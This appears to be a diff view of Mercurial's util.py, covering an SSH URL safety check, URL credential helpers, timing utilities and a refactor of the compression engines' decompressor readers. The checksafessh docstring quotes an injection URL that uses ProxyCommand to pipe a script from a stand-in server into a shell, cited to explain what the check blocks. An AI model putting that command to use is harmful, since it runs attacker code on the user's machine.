2829 2834 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2830 2835
2831 2836 This is a sanity check for ssh urls. ssh will parse the first item as
2832 2837 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2833 2838 Let's prevent these potentially exploitable urls entirely and warn the
2834 2839 user.
2835 2840
2836 2841 Raises an error.Abort when the url is unsafe.
2837 2842 """
2838 2843 path = urlreq.unquote(path)
2839 2844 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2840 2845 raise error.Abort(_('potentially unsafe url: %r') %
2841 2846 (pycompat.bytestr(path),))
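# Illustrative sketch (not part of this change): the quoted form is unsafe
# too, because unquoting happens before the check.
#
# >>> checksafessh(b'ssh://example.com/repo')        # returns None
# >>> checksafessh(b'ssh://-oProxyCommand=x/repo')   # raises error.Abort
# >>> checksafessh(b'ssh://%2DoProxyCommand=x/repo') # also raises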
2842 2847
2843 2848 def hidepassword(u):
2844 2849 '''hide user credential in a url string'''
2845 2850 u = url(u)
2846 2851 if u.passwd:
2847 2852 u.passwd = '***'
2848 2853 return bytes(u)
2849 2854
2850 2855 def removeauth(u):
2851 2856 '''remove all authentication information from a url string'''
2852 2857 u = url(u)
2853 2858 u.user = u.passwd = None
2854 2859 return bytes(u)
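# For example (sketch, assuming this module's namespace):
#
# >>> hidepassword(b'http://joe:xyz@host/repo')
# 'http://joe:***@host/repo'
# >>> removeauth(b'http://joe:xyz@host/repo')
# 'http://host/repo'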
2855 2860
2856 2861 timecount = unitcountfn(
2857 2862 (1, 1e3, _('%.0f s')),
2858 2863 (100, 1, _('%.1f s')),
2859 2864 (10, 1, _('%.2f s')),
2860 2865 (1, 1, _('%.3f s')),
2861 2866 (100, 0.001, _('%.1f ms')),
2862 2867 (10, 0.001, _('%.2f ms')),
2863 2868 (1, 0.001, _('%.3f ms')),
2864 2869 (100, 0.000001, _('%.1f us')),
2865 2870 (10, 0.000001, _('%.2f us')),
2866 2871 (1, 0.000001, _('%.3f us')),
2867 2872 (100, 0.000000001, _('%.1f ns')),
2868 2873 (10, 0.000000001, _('%.2f ns')),
2869 2874 (1, 0.000000001, _('%.3f ns')),
2870 2875 )
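# Worked examples (sketch, assuming unitcountfn's usual behavior of picking
# the first row whose threshold multiplier * divisor is met):
# timecount(4.2) -> '4.200 s' via the (1, 1, '%.3f s') row, and
# timecount(0.0042) -> '4.200 ms' via the (1, 0.001, '%.3f ms') row.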
2871 2876
2872 2877 _timenesting = [0]
2873 2878
2874 2879 def timed(func):
2875 2880 '''Report the execution time of a function call to stderr.
2876 2881
2877 2882 During development, use as a decorator when you need to measure
2878 2883 the cost of a function, e.g. as follows:
2879 2884
2880 2885 @util.timed
2881 2886 def foo(a, b, c):
2882 2887 pass
2883 2888 '''
2884 2889
2885 2890 def wrapper(*args, **kwargs):
2886 2891 start = timer()
2887 2892 indent = 2
2888 2893 _timenesting[0] += indent
2889 2894 try:
2890 2895 return func(*args, **kwargs)
2891 2896 finally:
2892 2897 elapsed = timer() - start
2893 2898 _timenesting[0] -= indent
2894 2899 stderr = procutil.stderr
2895 2900 stderr.write('%s%s: %s\n' %
2896 2901 (' ' * _timenesting[0], func.__name__,
2897 2902 timecount(elapsed)))
2898 2903 return wrapper
2899 2904
2900 2905 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2901 2906 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2902 2907
2903 2908 def sizetoint(s):
2904 2909 '''Convert a size specifier to a byte count.
2905 2910
2906 2911 >>> sizetoint(b'30')
2907 2912 30
2908 2913 >>> sizetoint(b'2.2kb')
2909 2914 2252
2910 2915 >>> sizetoint(b'6M')
2911 2916 6291456
2912 2917 '''
2913 2918 t = s.strip().lower()
2914 2919 try:
2915 2920 for k, u in _sizeunits:
2916 2921 if t.endswith(k):
2917 2922 return int(float(t[:-len(k)]) * u)
2918 2923 return int(t)
2919 2924 except ValueError:
2920 2925 raise error.ParseError(_("couldn't parse size: %s") % s)
2921 2926
2922 2927 class hooks(object):
2923 2928 '''A collection of hook functions that can be used to extend a
2924 2929 function's behavior. Hooks are called in lexicographic order,
2925 2930 based on the names of their sources.'''
2926 2931
2927 2932 def __init__(self):
2928 2933 self._hooks = []
2929 2934
2930 2935 def add(self, source, hook):
2931 2936 self._hooks.append((source, hook))
2932 2937
2933 2938 def __call__(self, *args):
2934 2939 self._hooks.sort(key=lambda x: x[0])
2935 2940 results = []
2936 2941 for source, hook in self._hooks:
2937 2942 results.append(hook(*args))
2938 2943 return results
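# Usage sketch (hypothetical source names): hooks run sorted by source
# name, not by registration order.
#
# >>> h = hooks()
# >>> h.add('b-ext', lambda x: x * 2)
# >>> h.add('a-ext', lambda x: x + 1)
# >>> h(10)
# [11, 20]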
2939 2944
2940 2945 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2941 2946 '''Yields lines for a nicely formatted stacktrace.
2942 2947 Skips the 'skip' last entries, then returns the last 'depth' entries.
2943 2948 Each file+linenumber is formatted according to fileline.
2944 2949 Each line is formatted according to line.
2945 2950 If line is None, it yields:
2946 2951 length of longest filepath+line number,
2947 2952 filepath+linenumber,
2948 2953 function
2949 2954
2950 2955 Not to be used in production code, but very convenient while developing.
2951 2956 '''
2952 2957 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2953 2958 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2954 2959 ][-depth:]
2955 2960 if entries:
2956 2961 fnmax = max(len(entry[0]) for entry in entries)
2957 2962 for fnln, func in entries:
2958 2963 if line is None:
2959 2964 yield (fnmax, fnln, func)
2960 2965 else:
2961 2966 yield line % (fnmax, fnln, func)
2962 2967
2963 2968 def debugstacktrace(msg='stacktrace', skip=0,
2964 2969 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2965 2970 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2966 2971 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
2967 2972 By default it will flush stdout first.
2968 2973 It can be used everywhere and intentionally does not require an ui object.
2969 2974 Not to be used in production code, but very convenient while developing.
2970 2975 '''
2971 2976 if otherf:
2972 2977 otherf.flush()
2973 2978 f.write('%s at:\n' % msg.rstrip())
2974 2979 for line in getstackframes(skip + 1, depth=depth):
2975 2980 f.write(line)
2976 2981 f.flush()
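# Typical developer usage (sketch): drop a call anywhere to see how the
# current code path was reached, e.g. from another module:
#
# util.debugstacktrace('entering foo', skip=1, depth=5)
#
# which writes 'entering foo at:' plus the five innermost callers to stderr.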
2977 2982
2978 2983 class dirs(object):
2979 2984 '''a multiset of directory names from a dirstate or manifest'''
2980 2985
2981 2986 def __init__(self, map, skip=None):
2982 2987 self._dirs = {}
2983 2988 addpath = self.addpath
2984 2989 if safehasattr(map, 'iteritems') and skip is not None:
2985 2990 for f, s in map.iteritems():
2986 2991 if s[0] != skip:
2987 2992 addpath(f)
2988 2993 else:
2989 2994 for f in map:
2990 2995 addpath(f)
2991 2996
2992 2997 def addpath(self, path):
2993 2998 dirs = self._dirs
2994 2999 for base in finddirs(path):
2995 3000 if base in dirs:
2996 3001 dirs[base] += 1
2997 3002 return
2998 3003 dirs[base] = 1
2999 3004
3000 3005 def delpath(self, path):
3001 3006 dirs = self._dirs
3002 3007 for base in finddirs(path):
3003 3008 if dirs[base] > 1:
3004 3009 dirs[base] -= 1
3005 3010 return
3006 3011 del dirs[base]
3007 3012
3008 3013 def __iter__(self):
3009 3014 return iter(self._dirs)
3010 3015
3011 3016 def __contains__(self, d):
3012 3017 return d in self._dirs
3013 3018
3014 3019 if safehasattr(parsers, 'dirs'):
3015 3020 dirs = parsers.dirs
3016 3021
3017 3022 def finddirs(path):
3018 3023 pos = path.rfind('/')
3019 3024 while pos != -1:
3020 3025 yield path[:pos]
3021 3026 pos = path.rfind('/', 0, pos)
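# Illustrative sketch of the multiset semantics (pure-Python variant; the C
# implementation from parsers behaves the same):
#
# >>> d = dirs([b'a/b/c', b'a/b/d', b'e/f'])
# >>> list(finddirs(b'a/b/c'))
# ['a/b', 'a']
# >>> b'a/b' in d
# True
# >>> d.delpath(b'a/b/c'); d.delpath(b'a/b/d')
# >>> b'a/b' in d
# False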
3022 3027
3023 3028 # compression code
3024 3029
3025 3030 SERVERROLE = 'server'
3026 3031 CLIENTROLE = 'client'
3027 3032
3028 3033 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3029 3034 (u'name', u'serverpriority',
3030 3035 u'clientpriority'))
3031 3036
3032 3037 class compressormanager(object):
3033 3038 """Holds registrations of various compression engines.
3034 3039
3035 3040 This class essentially abstracts the differences between compression
3036 3041 engines to allow new compression formats to be added easily, possibly from
3037 3042 extensions.
3038 3043
3039 3044 Compressors are registered against the global instance by calling its
3040 3045 ``register()`` method.
3041 3046 """
3042 3047 def __init__(self):
3043 3048 self._engines = {}
3044 3049 # Bundle spec human name to engine name.
3045 3050 self._bundlenames = {}
3046 3051 # Internal bundle identifier to engine name.
3047 3052 self._bundletypes = {}
3048 3053 # Revlog header to engine name.
3049 3054 self._revlogheaders = {}
3050 3055 # Wire proto identifier to engine name.
3051 3056 self._wiretypes = {}
3052 3057
3053 3058 def __getitem__(self, key):
3054 3059 return self._engines[key]
3055 3060
3056 3061 def __contains__(self, key):
3057 3062 return key in self._engines
3058 3063
3059 3064 def __iter__(self):
3060 3065 return iter(self._engines.keys())
3061 3066
3062 3067 def register(self, engine):
3063 3068 """Register a compression engine with the manager.
3064 3069
3065 3070 The argument must be a ``compressionengine`` instance.
3066 3071 """
3067 3072 if not isinstance(engine, compressionengine):
3068 3073 raise ValueError(_('argument must be a compressionengine'))
3069 3074
3070 3075 name = engine.name()
3071 3076
3072 3077 if name in self._engines:
3073 3078 raise error.Abort(_('compression engine %s already registered') %
3074 3079 name)
3075 3080
3076 3081 bundleinfo = engine.bundletype()
3077 3082 if bundleinfo:
3078 3083 bundlename, bundletype = bundleinfo
3079 3084
3080 3085 if bundlename in self._bundlenames:
3081 3086 raise error.Abort(_('bundle name %s already registered') %
3082 3087 bundlename)
3083 3088 if bundletype in self._bundletypes:
3084 3089 raise error.Abort(_('bundle type %s already registered by %s') %
3085 3090 (bundletype, self._bundletypes[bundletype]))
3086 3091
3087 3092 # Only register an external facing name if one was declared.
3088 3093 if bundlename:
3089 3094 self._bundlenames[bundlename] = name
3090 3095
3091 3096 self._bundletypes[bundletype] = name
3092 3097
3093 3098 wiresupport = engine.wireprotosupport()
3094 3099 if wiresupport:
3095 3100 wiretype = wiresupport.name
3096 3101 if wiretype in self._wiretypes:
3097 3102 raise error.Abort(_('wire protocol compression %s already '
3098 3103 'registered by %s') %
3099 3104 (wiretype, self._wiretypes[wiretype]))
3100 3105
3101 3106 self._wiretypes[wiretype] = name
3102 3107
3103 3108 revlogheader = engine.revlogheader()
3104 3109 if revlogheader and revlogheader in self._revlogheaders:
3105 3110 raise error.Abort(_('revlog header %s already registered by %s') %
3106 3111 (revlogheader, self._revlogheaders[revlogheader]))
3107 3112
3108 3113 if revlogheader:
3109 3114 self._revlogheaders[revlogheader] = name
3110 3115
3111 3116 self._engines[name] = engine
3112 3117
3113 3118 @property
3114 3119 def supportedbundlenames(self):
3115 3120 return set(self._bundlenames.keys())
3116 3121
3117 3122 @property
3118 3123 def supportedbundletypes(self):
3119 3124 return set(self._bundletypes.keys())
3120 3125
3121 3126 def forbundlename(self, bundlename):
3122 3127 """Obtain a compression engine registered to a bundle name.
3123 3128
3124 3129 Will raise KeyError if the bundle type isn't registered.
3125 3130
3126 3131 Will abort if the engine is known but not available.
3127 3132 """
3128 3133 engine = self._engines[self._bundlenames[bundlename]]
3129 3134 if not engine.available():
3130 3135 raise error.Abort(_('compression engine %s could not be loaded') %
3131 3136 engine.name())
3132 3137 return engine
3133 3138
3134 3139 def forbundletype(self, bundletype):
3135 3140 """Obtain a compression engine registered to a bundle type.
3136 3141
3137 3142 Will raise KeyError if the bundle type isn't registered.
3138 3143
3139 3144 Will abort if the engine is known but not available.
3140 3145 """
3141 3146 engine = self._engines[self._bundletypes[bundletype]]
3142 3147 if not engine.available():
3143 3148 raise error.Abort(_('compression engine %s could not be loaded') %
3144 3149 engine.name())
3145 3150 return engine
3146 3151
3147 3152 def supportedwireengines(self, role, onlyavailable=True):
3148 3153 """Obtain compression engines that support the wire protocol.
3149 3154
3150 3155 Returns a list of engines in prioritized order, most desired first.
3151 3156
3152 3157 If ``onlyavailable`` is set, filter out engines that can't be
3153 3158 loaded.
3154 3159 """
3155 3160 assert role in (SERVERROLE, CLIENTROLE)
3156 3161
3157 3162 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3158 3163
3159 3164 engines = [self._engines[e] for e in self._wiretypes.values()]
3160 3165 if onlyavailable:
3161 3166 engines = [e for e in engines if e.available()]
3162 3167
3163 3168 def getkey(e):
3164 3169 # Sort first by priority, highest first. In case of tie, sort
3165 3170 # alphabetically. This is arbitrary, but ensures output is
3166 3171 # stable.
3167 3172 w = e.wireprotosupport()
3168 3173 return -1 * getattr(w, attr), w.name
3169 3174
3170 3175 return list(sorted(engines, key=getkey))
3171 3176
3172 3177 def forwiretype(self, wiretype):
3173 3178 engine = self._engines[self._wiretypes[wiretype]]
3174 3179 if not engine.available():
3175 3180 raise error.Abort(_('compression engine %s could not be loaded') %
3176 3181 engine.name())
3177 3182 return engine
3178 3183
3179 3184 def forrevlogheader(self, header):
3180 3185 """Obtain a compression engine registered to a revlog header.
3181 3186
3182 3187 Will raise KeyError if the revlog header value isn't registered.
3183 3188 """
3184 3189 return self._engines[self._revlogheaders[header]]
3185 3190
3186 3191 compengines = compressormanager()
3187 3192
3188 3193 class compressionengine(object):
3189 3194 """Base class for compression engines.
3190 3195
3191 3196 Compression engines must implement the interface defined by this class.
3192 3197 """
3193 3198 def name(self):
3194 3199 """Returns the name of the compression engine.
3195 3200
3196 3201 This is the key the engine is registered under.
3197 3202
3198 3203 This method must be implemented.
3199 3204 """
3200 3205 raise NotImplementedError()
3201 3206
3202 3207 def available(self):
3203 3208 """Whether the compression engine is available.
3204 3209
3205 3210 The intent of this method is to allow optional compression engines
3206 3211 that may not be available in all installations (such as engines relying
3207 3212 on C extensions that may not be present).
3208 3213 """
3209 3214 return True
3210 3215
3211 3216 def bundletype(self):
3212 3217 """Describes bundle identifiers for this engine.
3213 3218
3214 3219 If this compression engine isn't supported for bundles, returns None.
3215 3220
3216 3221 If this engine can be used for bundles, returns a 2-tuple of strings of
3217 3222 the user-facing "bundle spec" compression name and an internal
3218 3223 identifier used to denote the compression format within bundles. To
3219 3224 exclude the name from external usage, set the first element to ``None``.
3220 3225
3221 3226 If bundle compression is supported, the class must also implement
3222 3227 ``compressstream`` and ``decompressorreader``.
3223 3228
3224 3229 The docstring of this method is used in the help system to tell users
3225 3230 about this engine.
3226 3231 """
3227 3232 return None
3228 3233
3229 3234 def wireprotosupport(self):
3230 3235 """Declare support for this compression format on the wire protocol.
3231 3236
3232 3237 If this compression engine isn't supported for compressing wire
3233 3238 protocol payloads, returns None.
3234 3239
3235 3240 Otherwise, returns ``compenginewireprotosupport`` with the following
3236 3241 fields:
3237 3242
3238 3243 * String format identifier
3239 3244 * Integer priority for the server
3240 3245 * Integer priority for the client
3241 3246
3242 3247 The integer priorities are used to order the advertisement of format
3243 3248 support by server and client. The highest integer is advertised
3244 3249 first. Integers with non-positive values aren't advertised.
3245 3250
3246 3251 The priority values are somewhat arbitrary and only used for default
3247 3252 ordering. The relative order can be changed via config options.
3248 3253
3249 3254 If wire protocol compression is supported, the class must also implement
3250 3255 ``compressstream`` and ``decompressorreader``.
3251 3256 """
3252 3257 return None
3253 3258
3254 3259 def revlogheader(self):
3255 3260 """Header added to revlog chunks that identifies this engine.
3256 3261
3257 3262 If this engine can be used to compress revlogs, this method should
3258 3263 return the bytes used to identify chunks compressed with this engine.
3259 3264 Else, the method should return ``None`` to indicate it does not
3260 3265 participate in revlog compression.
3261 3266 """
3262 3267 return None
3263 3268
3264 3269 def compressstream(self, it, opts=None):
3265 3270 """Compress an iterator of chunks.
3266 3271
3267 3272 The method receives an iterator (ideally a generator) of chunks of
3268 3273 bytes to be compressed. It returns an iterator (ideally a generator)
3269 3274 of chunks of bytes representing the compressed output.
3270 3275
3271 3276 Optionally accepts an argument defining how to perform compression.
3272 3277 Each engine treats this argument differently.
3273 3278 """
3274 3279 raise NotImplementedError()
3275 3280
3276 3281 def decompressorreader(self, fh):
3277 3282 """Perform decompression on a file object.
3278 3283
3279 3284 Argument is an object with a ``read(size)`` method that returns
3280 3285 compressed data. Return value is an object with a ``read(size)`` that
3281 3286 returns uncompressed data.
3282 3287 """
3283 3288 raise NotImplementedError()
3284 3289
3285 3290 def revlogcompressor(self, opts=None):
3286 3291 """Obtain an object that can be used to compress revlog entries.
3287 3292
3288 3293 The object has a ``compress(data)`` method that compresses binary
3289 3294 data. This method returns compressed binary data or ``None`` if
3290 3295 the data could not be compressed (too small, not compressible, etc).
3291 3296 The returned data should have a header uniquely identifying this
3292 3297 compression format so decompression can be routed to this engine.
3293 3298 This header should be identified by the ``revlogheader()`` return
3294 3299 value.
3295 3300
3296 3301 The object has a ``decompress(data)`` method that decompresses
3297 3302 data. The method will only be called if ``data`` begins with
3298 3303 ``revlogheader()``. The method should return the raw, uncompressed
3299 3304 data or raise a ``RevlogError``.
3300 3305
3301 3306 The object is reusable but is not thread safe.
3302 3307 """
3303 3308 raise NotImplementedError()
3304 3309
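# Minimal interface sketch (hypothetical engine, not part of this change):
# a pass-through engine only needs name(), bundletype(), compressstream()
# and decompressorreader() before it can be handed to compengines.register().
#
# class _identityengine(compressionengine):
#     def name(self):
#         return 'identity'
#     def bundletype(self):
#         """Hypothetical pass-through engine (illustration only)."""
#         return 'identity', 'ID'
#     def compressstream(self, it, opts=None):
#         return it
#     def decompressorreader(self, fh):
#         return fh
#
# compengines.register(_identityengine())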
3310 class _CompressedStreamReader(object):
3311 def __init__(self, fh):
3312 if safehasattr(fh, 'unbufferedread'):
3313 self._reader = fh.unbufferedread
3314 else:
3315 self._reader = fh.read
3316 self._pending = []
3317 self._pos = 0
3318 self._eof = False
3319
3320 def _decompress(self, chunk):
3321 raise NotImplementedError()
3322
3323 def read(self, l):
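# Serve 'l' bytes from the already-decompressed chunks queued in
# self._pending, pulling at most 64k of compressed input from the
# underlying stream only when the buffered data runs out.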
3324 buf = []
3325 while True:
3326 while self._pending:
3327 if len(self._pending[0]) > l + self._pos:
3328 newbuf = self._pending[0]
3329 buf.append(newbuf[self._pos:self._pos + l])
3330 self._pos += l
3331 return ''.join(buf)
3332
3333 newbuf = self._pending.pop(0)
3334 if self._pos:
3335 buf.append(newbuf[self._pos:])
3336 l -= len(newbuf) - self._pos
3337 else:
3338 buf.append(newbuf)
3339 l -= len(newbuf)
3340 self._pos = 0
3341
3342 if self._eof:
3343 return ''.join(buf)
3344 chunk = self._reader(65536)
3345 self._decompress(chunk)
3346
3347 class _GzipCompressedStreamReader(_CompressedStreamReader):
3348 def __init__(self, fh):
3349 super(_GzipCompressedStreamReader, self).__init__(fh)
3350 self._decompobj = zlib.decompressobj()
3351 def _decompress(self, chunk):
3352 newbuf = self._decompobj.decompress(chunk)
3353 if newbuf:
3354 self._pending.append(newbuf)
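# zlib gives no direct end-of-stream signal, so probe a copy of the
# decompressor with a sentinel byte: once the deflate stream is complete,
# extra input passes straight through to unused_data.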
3355 d = self._decompobj.copy()
3356 try:
3357 d.decompress('x')
3358 d.flush()
3359 if d.unused_data == 'x':
3360 self._eof = True
3361 except zlib.error:
3362 pass
3363
3364 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3365 def __init__(self, fh):
3366 super(_BZ2CompressedStreamReader, self).__init__(fh)
3367 self._decompobj = bz2.BZ2Decompressor()
3368 def _decompress(self, chunk):
3369 newbuf = self._decompobj.decompress(chunk)
3370 if newbuf:
3371 self._pending.append(newbuf)
3372 try:
3373 while True:
3374 newbuf = self._decompobj.decompress('')
3375 if newbuf:
3376 self._pending.append(newbuf)
3377 else:
3378 break
3379 except EOFError:
3380 self._eof = True
3381
3382 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3383 def __init__(self, fh):
3384 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3385 newbuf = self._decompobj.decompress('BZ')
3386 if newbuf:
3387 self._pending.append(newbuf)
3388
3389 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3390 def __init__(self, fh, zstd):
3391 super(_ZstdCompressedStreamReader, self).__init__(fh)
3392 self._zstd = zstd
3393 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3394 def _decompress(self, chunk):
3395 newbuf = self._decompobj.decompress(chunk)
3396 if newbuf:
3397 self._pending.append(newbuf)
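# Drain buffered output with empty input; python-zstandard raises
# ZstdError once the frame is exhausted, which is treated as EOF here.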
3398 try:
3399 while True:
3400 newbuf = self._decompobj.decompress('')
3401 if newbuf:
3402 self._pending.append(newbuf)
3403 else:
3404 break
3405 except self._zstd.ZstdError:
3406 self._eof = True
3407
3305 3408 class _zlibengine(compressionengine):
3306 3409 def name(self):
3307 3410 return 'zlib'
3308 3411
3309 3412 def bundletype(self):
3310 3413 """zlib compression using the DEFLATE algorithm.
3311 3414
3312 3415 All Mercurial clients should support this format. The compression
3313 3416 algorithm strikes a reasonable balance between compression ratio
3314 3417 and size.
3315 3418 """
3316 3419 return 'gzip', 'GZ'
3317 3420
3318 3421 def wireprotosupport(self):
3319 3422 return compewireprotosupport('zlib', 20, 20)
3320 3423
3321 3424 def revlogheader(self):
3322 3425 return 'x'
3323 3426
3324 3427 def compressstream(self, it, opts=None):
3325 3428 opts = opts or {}
3326 3429
3327 3430 z = zlib.compressobj(opts.get('level', -1))
3328 3431 for chunk in it:
3329 3432 data = z.compress(chunk)
3330 3433 # Not all calls to compress emit data. It is cheaper to inspect
3331 3434 # here than to feed empty chunks through the generator.
3332 3435 if data:
3333 3436 yield data
3334 3437
3335 3438 yield z.flush()
3336 3439
3337 3440 def decompressorreader(self, fh):
3338 def gen():
3339 d = zlib.decompressobj()
3340 for chunk in filechunkiter(fh):
3341 while chunk:
3342 # Limit output size to limit memory.
3343 yield d.decompress(chunk, 2 ** 18)
3344 chunk = d.unconsumed_tail
3345
3346 return chunkbuffer(gen())
3441 return _GzipCompressedStreamReader(fh)
3347 3442
3348 3443 class zlibrevlogcompressor(object):
3349 3444 def compress(self, data):
3350 3445 insize = len(data)
3351 3446 # Caller handles empty input case.
3352 3447 assert insize > 0
3353 3448
3354 3449 if insize < 44:
3355 3450 return None
3356 3451
3357 3452 elif insize <= 1000000:
3358 3453 compressed = zlib.compress(data)
3359 3454 if len(compressed) < insize:
3360 3455 return compressed
3361 3456 return None
3362 3457
3363 3458 # zlib makes an internal copy of the input buffer, doubling
3364 3459 # memory usage for large inputs. So do streaming compression
3365 3460 # on large inputs.
3366 3461 else:
3367 3462 z = zlib.compressobj()
3368 3463 parts = []
3369 3464 pos = 0
3370 3465 while pos < insize:
3371 3466 pos2 = pos + 2**20
3372 3467 parts.append(z.compress(data[pos:pos2]))
3373 3468 pos = pos2
3374 3469 parts.append(z.flush())
3375 3470
3376 3471 if sum(map(len, parts)) < insize:
3377 3472 return ''.join(parts)
3378 3473 return None
3379 3474
3380 3475 def decompress(self, data):
3381 3476 try:
3382 3477 return zlib.decompress(data)
3383 3478 except zlib.error as e:
3384 3479 raise error.RevlogError(_('revlog decompress error: %s') %
3385 3480 stringutil.forcebytestr(e))
3386 3481
3387 3482 def revlogcompressor(self, opts=None):
3388 3483 return self.zlibrevlogcompressor()
3389 3484
3390 3485 compengines.register(_zlibengine())
3391 3486
3392 3487 class _bz2engine(compressionengine):
3393 3488 def name(self):
3394 3489 return 'bz2'
3395 3490
3396 3491 def bundletype(self):
3397 3492 """An algorithm that produces smaller bundles than ``gzip``.
3398 3493
3399 3494 All Mercurial clients should support this format.
3400 3495
3401 3496 This engine will likely produce smaller bundles than ``gzip`` but
3402 3497 will be significantly slower, both during compression and
3403 3498 decompression.
3404 3499
3405 3500 If available, the ``zstd`` engine can yield similar or better
3406 3501 compression at much higher speeds.
3407 3502 """
3408 3503 return 'bzip2', 'BZ'
3409 3504
3410 3505 # We declare a protocol name but don't advertise by default because
3411 3506 # it is slow.
3412 3507 def wireprotosupport(self):
3413 3508 return compewireprotosupport('bzip2', 0, 0)
3414 3509
3415 3510 def compressstream(self, it, opts=None):
3416 3511 opts = opts or {}
3417 3512 z = bz2.BZ2Compressor(opts.get('level', 9))
3418 3513 for chunk in it:
3419 3514 data = z.compress(chunk)
3420 3515 if data:
3421 3516 yield data
3422 3517
3423 3518 yield z.flush()
3424 3519
3425 3520 def decompressorreader(self, fh):
3426 def gen():
3427 d = bz2.BZ2Decompressor()
3428 for chunk in filechunkiter(fh):
3429 yield d.decompress(chunk)
3430
3431 return chunkbuffer(gen())
3521 return _BZ2CompressedStreamReader(fh)
3432 3522
3433 3523 compengines.register(_bz2engine())
3434 3524
3435 3525 class _truncatedbz2engine(compressionengine):
3436 3526 def name(self):
3437 3527 return 'bz2truncated'
3438 3528
3439 3529 def bundletype(self):
3440 3530 return None, '_truncatedBZ'
3441 3531
3442 3532 # We don't implement compressstream because it is hackily handled elsewhere.
3443 3533
3444 3534 def decompressorreader(self, fh):
3445 def gen():
3446 # The input stream doesn't have the 'BZ' header. So add it back.
3447 d = bz2.BZ2Decompressor()
3448 d.decompress('BZ')
3449 for chunk in filechunkiter(fh):
3450 yield d.decompress(chunk)
3451
3452 return chunkbuffer(gen())
3535 return _TruncatedBZ2CompressedStreamReader(fh)
3453 3536
3454 3537 compengines.register(_truncatedbz2engine())
3455 3538
3456 3539 class _noopengine(compressionengine):
3457 3540 def name(self):
3458 3541 return 'none'
3459 3542
3460 3543 def bundletype(self):
3461 3544 """No compression is performed.
3462 3545
3463 3546 Use this compression engine to explicitly disable compression.
3464 3547 """
3465 3548 return 'none', 'UN'
3466 3549
3467 3550 # Clients always support uncompressed payloads. Servers don't advertise it
3468 3551 # by default because, unless you are on a fast network, uncompressed
3469 3552 # payloads can easily saturate your network pipe.
3470 3553 def wireprotosupport(self):
3471 3554 return compewireprotosupport('none', 0, 10)
3472 3555
3473 3556 # We don't implement revlogheader because it is handled specially
3474 3557 # in the revlog class.
3475 3558
3476 3559 def compressstream(self, it, opts=None):
3477 3560 return it
3478 3561
3479 3562 def decompressorreader(self, fh):
3480 3563 return fh
3481 3564
3482 3565 class nooprevlogcompressor(object):
3483 3566 def compress(self, data):
3484 3567 return None
3485 3568
3486 3569 def revlogcompressor(self, opts=None):
3487 3570 return self.nooprevlogcompressor()
3488 3571
3489 3572 compengines.register(_noopengine())
3490 3573
3491 3574 class _zstdengine(compressionengine):
3492 3575 def name(self):
3493 3576 return 'zstd'
3494 3577
3495 3578 @propertycache
3496 3579 def _module(self):
3497 3580 # Not all installs have the zstd module available. So defer importing
3498 3581 # until first access.
3499 3582 try:
3500 3583 from . import zstd
3501 3584 # Force delayed import.
3502 3585 zstd.__version__
3503 3586 return zstd
3504 3587 except ImportError:
3505 3588 return None
3506 3589
3507 3590 def available(self):
3508 3591 return bool(self._module)
3509 3592
3510 3593 def bundletype(self):
3511 3594 """A modern compression algorithm that is fast and highly flexible.
3512 3595
3513 3596 Only supported by Mercurial 4.1 and newer clients.
3514 3597
3515 3598 With the default settings, zstd compression is both faster and yields
3516 3599 better compression than ``gzip``. It also frequently yields better
3517 3600 compression than ``bzip2`` while operating at much higher speeds.
3518 3601
3519 3602 If this engine is available and backwards compatibility is not a
3520 3603 concern, it is likely the best available engine.
3521 3604 """
3522 3605 return 'zstd', 'ZS'
3523 3606
3524 3607 def wireprotosupport(self):
3525 3608 return compewireprotosupport('zstd', 50, 50)
3526 3609
3527 3610 def revlogheader(self):
3528 3611 return '\x28'
3529 3612
3530 3613 def compressstream(self, it, opts=None):
3531 3614 opts = opts or {}
3532 3615 # zstd level 3 is almost always significantly faster than zlib
3533 3616 # while providing no worse compression. It strikes a good balance
3534 3617 # between speed and compression.
3535 3618 level = opts.get('level', 3)
3536 3619
3537 3620 zstd = self._module
3538 3621 z = zstd.ZstdCompressor(level=level).compressobj()
3539 3622 for chunk in it:
3540 3623 data = z.compress(chunk)
3541 3624 if data:
3542 3625 yield data
3543 3626
3544 3627 yield z.flush()
3545 3628
3546 3629 def decompressorreader(self, fh):
3547 zstd = self._module
3548 dctx = zstd.ZstdDecompressor()
3549 return chunkbuffer(dctx.read_from(fh))
3630 return _ZstdCompressedStreamReader(fh, self._module)
3550 3631
3551 3632 class zstdrevlogcompressor(object):
3552 3633 def __init__(self, zstd, level=3):
3553 3634 # TODO consider omitting frame magic to save 4 bytes.
3554 3635 # This writes content sizes into the frame header. That is
3555 3636 # extra storage. But it allows a correct size memory allocation
3556 3637 # to hold the result.
3557 3638 self._cctx = zstd.ZstdCompressor(level=level)
3558 3639 self._dctx = zstd.ZstdDecompressor()
3559 3640 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3560 3641 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3561 3642
3562 3643 def compress(self, data):
3563 3644 insize = len(data)
3564 3645 # Caller handles empty input case.
3565 3646 assert insize > 0
3566 3647
3567 3648 if insize < 50:
3568 3649 return None
3569 3650
3570 3651 elif insize <= 1000000:
3571 3652 compressed = self._cctx.compress(data)
3572 3653 if len(compressed) < insize:
3573 3654 return compressed
3574 3655 return None
3575 3656 else:
3576 3657 z = self._cctx.compressobj()
3577 3658 chunks = []
3578 3659 pos = 0
3579 3660 while pos < insize:
3580 3661 pos2 = pos + self._compinsize
3581 3662 chunk = z.compress(data[pos:pos2])
3582 3663 if chunk:
